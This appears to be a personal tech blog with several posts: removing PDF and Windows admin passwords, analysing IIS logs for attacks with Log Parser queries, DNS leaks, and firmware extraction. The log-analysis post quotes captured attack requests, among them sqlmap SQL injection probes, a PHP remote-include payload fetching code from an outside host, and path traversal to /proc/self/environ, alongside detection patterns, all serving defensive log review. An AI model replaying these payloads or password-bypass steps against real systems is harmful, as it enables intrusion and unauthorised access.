Wednesday, January 28, 2015

Removing password from protected PDF documents

$ pdftops [your_protected_pdf_document.pdf] out.ps

$ ps2pdf [out.ps] broken_protection_pdf_document.pdf 
http://www.cyberciti.biz/faq/removing-password-from-pdf-on-linux/
Type the following command to install xpdf-utils:

$ sudo apt-get install xpdf-utils

First, decrypt the PDF and create a PostScript file:

pdftops input.pdf out.ps

You will get an out.ps file. This can be printed or opened under Linux itself, but you can also convert the .ps (PostScript) file back to a PDF as follows:

ps2pdf out.ps ready.pdf

Please note that the ps2pdf command is part of Ghostscript and will get installed when you install xpdf-utils.
Note that this round trip only strips owner-password restrictions (printing, copying, editing); a PDF that needs a password to open still has to be given that password (pdftops -upw) before it can be converted at all.
Now you can convert it with Nitro PDF https://www.gonitro.com/pro

Wednesday, January 21, 2015

Remove Admin Password from Win 7, 8, 2008 etc for free

http://pogostick.net/~pnh/ntpasswd/bootdisk.html

***************************************************************************
*                                                                         *
*         Windows Change Password / Registry Editor / Boot CD             *
*                                                                         *
*  (c) 1998-2014 Petter Nordahl-Hagen. Distributed under GNU GPL v2       *
*                                                                         *
* DISCLAIMER: THIS SOFTWARE COMES WITH ABSOLUTELY NO WARRANTIES!          *
*             THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE       *
*             CAUSED BY THE (MIS)USE OF THIS SOFTWARE                     *
*                                                                         *
* More info at: http://pogostick.net/~pnh/ntpasswd/                       *
* Email       : pnh@pogostick.net                                         *
***************************************************************************

Just boot this CD and follow instructions.
Usually, just pressing return/enter should work, except some
drivers may have to be loaded manually with the 'm' menu option after boot.

 ---

The password reset and registry edit has now been tested with the following:

NT 3.51, NT 4, Windows 2000, Windows XP, Windows 2003 Server,
Vista, Windows 7, Server 2008, Windows 8, Windows 8.1, Server 2012

As far as I know, it will work with all Service Packs (SP) and
all editions (Professional, Server, Home etc)
Also, 64 bit windows versions should be OK.

 ---

To make a bootable USB drive / key:

1. Copy all files from this CD onto the USB drive.
   It cannot be in a subdirectory on the drive.
   You do not need to delete files already on the drive.
2. Install the bootloader
   On the USB drive, there should now be a file "syslinux.exe".
   Start a command line window (cmd.exe) with "run as administrator"
   From the command line, run the command like this:


j:\syslinux.exe -ma j:

replace j with some other letter if your USB drive is on another
drive letter than j:
On some drives, you may have to omit the -ma option if you
get an error.
If it says nothing, it probably did install the bootloader.

Please note that you may have to adjust settings in your computer's BIOS
setup to boot from USB.
Also, some BIOS (often older machines) simply won't boot from USB anyway.
Unfortunately, there are extremely many different versions of BIOS,
and a lot of them are rather buggy when it comes to booting off different
media, so I am unable to help you.


Tuesday, January 13, 2015

Searching - Replacing in log files

A long time ago I found an amazing tool for this kind of task:

http://www.mind-pioneer.com/

Here is how to extract IP addresses from a log file:

http://www.mind-pioneer.com/services/419_Text_file_parser.html


This is a short list of what you can do with IP addresses in logs:

http://www.mind-pioneer.com/services/conv_search.php?key=IP+address&type=all&x=30&y=12


Monday, January 12, 2015

How to use Log Parser Lizard




A Log Parser GUI for Microsoft Log Parser http://www.lizard-labs.com/log_parser_lizard.aspx is a versatile tool that provides quick access to log files, XML files, CSV files, as well as data sources on the Microsoft Windows operating system. Now, businesses running Log Parser can use this query software to find exactly what they need exactly when they need it.




1) Click on the “IIS logs” button.
2) Click on the “Attacks” link.
3) Change line 3 to the path of your log location. Keep the format and do not forget to end the line with \*.log'.
4) Click the “Run Query” button.

Predefined Queries


The following are the queries we use to analyse the logs, with their purpose:

Main Query used for most Attacks:


This query covers the following attacks: directory discovery, XSS, XSF, SQL injection and command injection. The PHP part covers all attacks related to PHP technology. We monitor these attacks because attackers can develop a new attack if they see that the technology is different.

SELECT date AS Date, c-ip AS IP,cs-uri-stem AS URL_Address, cs-uri-query AS Attack_Details,
count(*) AS Attempts
FROM 'C:\IIS Logs\Logs\*.log'

Where (cs-uri-query LIKE '%./%') OR (cs-uri-query LIKE '%.php%') OR (cs-uri-query LIKE '%//.%')
OR (cs-uri-query LIKE '%src=http%') OR (cs-uri-query LIKE '%src=ftp%') OR (cs-uri-query LIKE '%l=ftp://%')
OR (cs-uri-query LIKE '%l=http://%') OR (cs-uri-query LIKE '%SELECT%') OR (cs-uri-stem LIKE '%.php%')

GROUP BY date, c-ip, cs-uri-stem, cs-uri-query ORDER BY date, c-ip, cs-uri-query

SQL Injection Attempts:

SELECT date AS Date, c-ip AS IP, cs-uri-query AS Query_Made, cs(User-Agent) AS Browser,
count(*) AS Attempts
FROM 'C:\IIS Logs\Logs\*.log'

Where cs(User-Agent) LIKE '%sql%'

GROUP BY date, c-ip, cs-uri-query, cs(User-Agent) ORDER BY date, c-ip, cs-uri-query

Query details:

  • (cs-uri-query LIKE '%./%') - searches for the “./” pattern (“%” means “any symbols”) - directory discovery.
  • (cs-uri-query LIKE '%.php%') - searches for any record containing “*.php” - any PHP-related attack.
  • (cs-uri-query LIKE '%//.%') - searches for the “//.” pattern - directory discovery.
  • (cs-uri-query LIKE '%src=http%') - XSS.
  • (cs-uri-query LIKE '%src=ftp%') - XSS.
  • (cs-uri-query LIKE '%l=ftp://%') - XSS.
  • (cs-uri-query LIKE '%l=http://%') - XSS.
  • (cs-uri-query LIKE '%SELECT%') - SQL injection.
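As an added example (not from the original post), here are the main “Attacks” query and the “SQL Injection Attempts” query re-implemented in Python over W3C-format IIS log lines, so the same patterns can be run where Log Parser is not installed; the sample log is constructed to mimic the post's entries, with a dummy server IP.

```python
# Added example, not from the original post: the Log Parser "Attacks" and "SQL Injection
# Attempts" queries re-implemented in Python over W3C IIS log lines (constructed sample).
from collections import Counter
from urllib.parse import unquote

# (field, substring) pairs equivalent to the LIKE '%...%' clauses of the main query.
PATTERNS = [
    ("cs-uri-query", "./"),         # directory discovery
    ("cs-uri-query", ".php"),       # PHP-related attacks
    ("cs-uri-query", "//."),        # directory discovery
    ("cs-uri-query", "src=http"),   # XSS
    ("cs-uri-query", "src=ftp"),    # XSS
    ("cs-uri-query", "l=ftp://"),   # XSS
    ("cs-uri-query", "l=http://"),  # XSS
    ("cs-uri-query", "select"),     # SQL injection
    ("cs-uri-stem", ".php"),        # PHP-related attacks
]
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2012-08-31 00:01:38 10.0.0.5 GET /RIR_RDI/RIR_RDI.aspx id=452642&l=e 8080 - 59.167.198.149 Mozilla/5.0 200 0 0 1060
2012-07-18 17:29:52 10.0.0.5 GET /RIR_RDI/index_e.aspx n=y%29%20AND%201249%3D9782%20AND%20%288697%3D8697 8080 - 198.103.148.111 sqlmap/1.0-dev 200 0 0 15
2012-08-22 12:37:56 10.0.0.5 GET /index.php option=com_acctexp&controller=../../../../proc/self/environ00 8080 - 195.114.19.111 Mozilla/5.0 404 0 2 109
2012-08-22 12:37:57 10.0.0.5 GET /index.php option=com_acctexp&controller=../../../../proc/self/environ00 8080 - 195.114.19.111 Mozilla/5.0 404 0 2 78
"""

def parse_w3c(text):
    """Yield one dict per entry, using the #Fields header to name the columns."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split(" ")
            if len(parts) == len(fields):      # skip truncated or malformed entries
                yield dict(zip(fields, parts))

def attack_query(rows):
    """Main query: entries matching any pattern, grouped by date, c-ip, stem and query."""
    hits = Counter()
    for r in rows:
        if any(needle in r[field].lower() for field, needle in PATTERNS):  # case-insensitive LIKE
            hits[(r["date"], r["c-ip"], r["cs-uri-stem"], r["cs-uri-query"])] += 1
    return sorted(hits.items())   # ORDER BY date, c-ip, ...

def sqli_ua_query(rows):
    """'SQL Injection Attempts' query: any user agent containing 'sql' (e.g. sqlmap)."""
    hits = Counter()
    for r in rows:
        if "sql" in r["cs(User-Agent)"].lower():
            hits[(r["date"], r["c-ip"], r["cs-uri-query"], r["cs(User-Agent)"])] += 1
    return sorted(hits.items())

def decode_query(query):
    """URL-decode cs-uri-query so the payload reads as the application saw it."""
    return unquote(query)

if __name__ == "__main__":
    rows = list(parse_w3c(SAMPLE_LOG))
    print("main query:", attack_query(rows))
    print("user-agent query:", sqli_ua_query(rows))  # the sqlmap probe only shows up here
```

Note that the sqlmap probe is caught only by the user-agent query: its query string matches none of the main query's patterns, which is why both queries are needed.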





1) Click “Export to Excel”.
2) Choose a location.
3) Click “Save”.

After that you can perform the log analysis and reporting.

WW3 Logs Analyses




When you look into logs there is a pattern of normal activity. You will easily find the pattern if you just start going through the logs. On some servers the pattern looks like this:

2012-08-31 00:00:13 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 200 0 0 234
2012-08-31 00:00:13 198.103.***.**POST /RIR_RDI/index_e.aspx n=y 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 302 0 0 124
2012-08-31 00:00:13 198.103.***.**GET /error/GenericErrorPage.htm aspxerrorpath=/RIR_RDI/index_e.aspx 8080 - 173.44.37.226 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.1.3)+Gecko/20090824+Firefox/3.5.3+GTB5 404 0 2 46
2012-08-31 00:01:38 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=452642&l=e 8080 - 59.167.198.149 Mozilla/5.0+(Windows+NT+6.0;+WOW64;+rv:14.0)+Gecko/20100101+Firefox/14.0.1 200 0 0 1060
2012-08-31 00:01:40 198.103.***.**POST /Reflex/index_f.aspx - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 200 0 0 608
2012-08-31 00:01:40 198.103.***.**GET /style/header.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 304 0 0 78
2012-08-31 00:01:40 198.103.***.**GET /style/footer.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 304 0 0 46
2012-08-31 00:01:40 198.103.***.**GET /style/refinfo.css - 8080 - 74.14.188.98 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0;+BTRS122412;+GTB7.4;+EasyBits+GO+v1.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729;+InfoPath.2;+AskTbORJ/5.13.1.18107) 200 0 0 31
2012-08-31 00:01:40 198.103.***.**GET /style/common.css - 8080 - 74.14.188.98

These normal entries contain the date, time, server IP, request details, remote host IP and details of the application and OS that were used.
When we scroll down the logs we can see different types of attacks.

Sample of an SQL injection attack

Performed to verify the security of the web site:

2012-07-18 17:29:33 198.103.***.**GET /RIR_RDI/index_e.aspx - 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 46
2012-07-18 17:29:34 198.103.***.**GET /RIR_RDI/index_e.aspx - 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 31
2012-07-18 17:29:50 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 46
2012-07-18 17:29:51 198.103.***.**GET /RIR_RDI/index_e.aspx n=y 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15
2012-07-18 17:29:51 198.103.***.**GET /RIR_RDI/index_e.aspx n=4853 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 31
2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%22%29%28%29%22%22%29%28%22%22 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15
2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%29%20AND%201249%3D9782%20AND%20%288697%3D8697 8080 - 198.103.148.111 sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org) 200 0 0 15

Let’s make a short analysis of this injection:

2012-07-18 17:29:52 198.103.***.**GET /RIR_RDI/index_e.aspx n=y%22%29%28%29%22%22%29%28%22%22 8080 - 198.103.148.111sqlmap/1.0-dev+(r4766)+(http://www.sqlmap.org)200 0 0 15


- The first highlighted part (the query string n=y%22%29%28%29%22%22%29%28%22%22) is the injection attempt, the second (198.103.148.111) is the IP address and the third (sqlmap/1.0-dev ...) is the details of the tool.
The first part is always present and is the main evidence that an SQL injection was attempted.
- The second part is the IP address. We copy this IP address and check its location at http://www.iplocation.net/.
The location helps to understand whether it is an internal test or VA. If the location is different from YOUR network, then we should start an investigation into whether this attack penetrated our web site.
- For the investigation we use dedicated computers with the BackTrack distribution installed, and with SQLMAP we try to repeat the SQL injection to see whether our application or network is vulnerable to such an attack.


Keep in mind that this is just one sample of an attack and that some attacks can look different.

Below are samples of other attacks: what they look like, how they differ from the normal pattern, and the IP location.

One sample from the application event logs shows a potential attack:

Exception information:     Exception type: HttpRequestValidationException    Exception message: A potentially dangerous Request.Form value was detected from the client (txtFulltext=""...jsc.djts, <a href=""http://qual...""). Request information:     Request URL: http://www.***.***:8080/RIR_RDI/index_e.aspx?n=y     Request path: /RIR_RDI/index_e.aspx     User host address: 96.47.225.66     User:      Is authenticated: False     Authentication Type:      Thread account name: IIS APPPOOL\CLFApps

You can see that the exception message says “A potentially dangerous Request...”; we can google it and see that it relates to the security of Windows forms on .NET. But we must be sure that it is not a repeated attempt to penetrate the web site. Unfortunately, without a sniffer we cannot see the whole URL (href=”http://qual...””), therefore we need to cross-search the other logs for the same time. In this situation a simple Google search shows that this IP address has been reported as a spam bot that tries to submit messages in forms. As our web site has a form, the spam bot automatically tries to submit a post there.

Sample of CSS (Cross Site Scripting) or XSS


2012-08-16 03:40:25 198.103.***.**GET /RIR_RDI/lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=test?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249
2012-08-16 03:40:26 198.103.***.**GET /RIR_RDI/lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://versatilityinprint.co.uk/osc/extras/Program_Files/daster.jpg?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249
2012-08-16 03:40:28 198.103.***.**GET /lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=test?? 8080 - 203.198.154.105 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 249
2012-08-16 03:40:29 198.103.***.**GET /lib/adodb_lite/adodb-perf-module.inc.php last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://versatilityinprint.co.uk/osc/extras/Program_Files/daster.jpg?? 8080 - 203.198.154.105


SQL Injection:

2012-09-05 18:18:45 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%27%60%28%5B%7B%5E%7E 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 483
2012-09-05 18:18:45 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%20aND%208%3D8 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 405
2012-09-05 18:18:46 198.103.***.**GET /RIR_RDI/RIR_RDI.aspx id=454036&l=e%20aND%208%3D3 8080 - 125.41.176.49 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 499

Possible directory enumeration attack:

2012-08-22 12:37:56 198.103.***.**GET /RIR_RDI/index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 195.114.19.111 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 109
2012-08-22 12:37:56 198.103.***.**GET /index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 195.114.19.111 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 109
2012-08-22 12:37:57 198.103.***.**GET /RIR_RDI/index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 91.121.115.109 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 78
2012-08-22 12:37:57 198.103.***.**GET /index.php option=com_acctexp&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ00 8080 - 91.121.115.109 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6 404 0 2 78




Tuesday, January 6, 2015

DNS leak and why should I care?


http://ipleak.net/ 

https://www.dnsleaktest.com/ 


When using an anonymity or privacy service, it is extremely important that all traffic originating from your computer is routed through the anonymity network. If any traffic leaks outside of the secure connection to the network, any adversary monitoring your traffic will be able to log your activity. DNS, the domain name system, is used to translate domain names such as www.privacyinternational.org into numerical IP addresses, e.g. 123.123.123.123, which are required to route packets of data on the Internet. Whenever your computer needs to contact a server on the Internet, such as when you enter a URL into your browser, your computer contacts a DNS server and requests the IP address. Most Internet service providers assign their customers a DNS server which they control and use for logging and recording your Internet activities. Under certain conditions, even when connected to the anonymity network, the operating system will continue to use its default DNS servers instead of the anonymous DNS servers assigned to your computer by the anonymity network. DNS leaks are a major privacy threat since the anonymity network may be providing a false sense of security while private data is leaking. If you are concerned about DNS leaks, you should also understand transparent DNS proxy technology to ensure that the solution you choose will stop DNS leaks.

How to extract firmware with little-big endian conversion.

I got the task of getting as much information as possible from an unknown firmware image.
The file is flash_dump.bin.
Pre-analysis with WinHex or other hex readers shows nothing.
So I need to use Kali Linux… Some tools are missing on Kali Linux and I have to install them first.

Tools which you need to install before you start working with firmware:

! On my Kali version those tools are preinstalled and I did not need to install them. If you find that you do not have these tools, here are the steps to install them.
Binwalk:
Check that binwalk is the latest version; in a terminal window:

apt-get install binwalk

It shows that binwalk is already the latest version. You can force the installation of a newer version with these commands:

Firmware-Mod-Kit
  • apt-get install git
  • apt-get install build-essential
  • apt-get install zlib
  • apt-get install zlib1g-dev
  • apt-get install liblzma-dev
  • apt-get install python-magic
  • apt-get install firmware-mod-kit  

If you need to find where it is installed, use the command:
  • find / -name extract-firmware.sh
In my case it is installed in: /opt/firmware-mod-kit/trunk/

Now we need to transfer the firmware BIN file into a Kali directory. I found a glitch where my Kali VM could not see my USB flash drive, and I fixed it with this setting (select USB 3).

I found that the easiest way to extract the image is to copy it into the same folder where Firmware-Mod-Kit is installed.

I’m using MC for this.


Now we need to look inside the image to understand what we can get from it.
Let’s extract the readable strings with the commands:

strings flash_dump.bin > strings.txt


And
binwalk -S flash_dump.bin > list.txt


After looking at those files we can see some strange strings:

The first highlighted words should definitely be “unknown” and “free”.

This happens because the architecture of the processor that uses this BIN file is 16 bit while the decompiling is 32 bit.
You can search the internet to understand “little/big endian”.

Basically we need to swap every pair of adjacent bytes: 1<>2, 3<>4, n<>(n+1).

This can easily be done with the command:

  • dd if=flash_dump.bin of=conv.bin conv=swab

It will convert the “strange” BIN file into conv.bin.

And now let’s run again:

  • strings conv.bin > strings_corr.txt


And
  • binwalk -S conv.bin > list_corr.txt


Now we can read it.

Let’s extract the files form the conv.bin image with command:
  • ./extract-firmware.sh conv.bin


Now you have extracted files which you can analyse and modify.

Another sample:

With a different firmware, from the ASUS router RT-AC68U, it is just 2 simple steps, because there is no confusing “little-big endian” part.

Before extracting, let’s verify that no little-big endian conversion is required.

Take the firmware, which is in a different format: RT-AC68U_3.0.0.4_374_5656-g8d0a991.trx

And run command:

  • strings RT-AC68U_3.0.0.4_374_5656-g8d0a991.trx > strings.txt

In the file strings.txt, go to the end and we can see that all the text is readable:


You have to copy this firmware into the directory where firmware-mod-kit is located and run the command:

  • ./extract-firmware.sh RT-AC68U_3.0.0.4_374_5656-g8d0a991.trx

The same “fmk” folder is created, with the extracted files ready for analysis.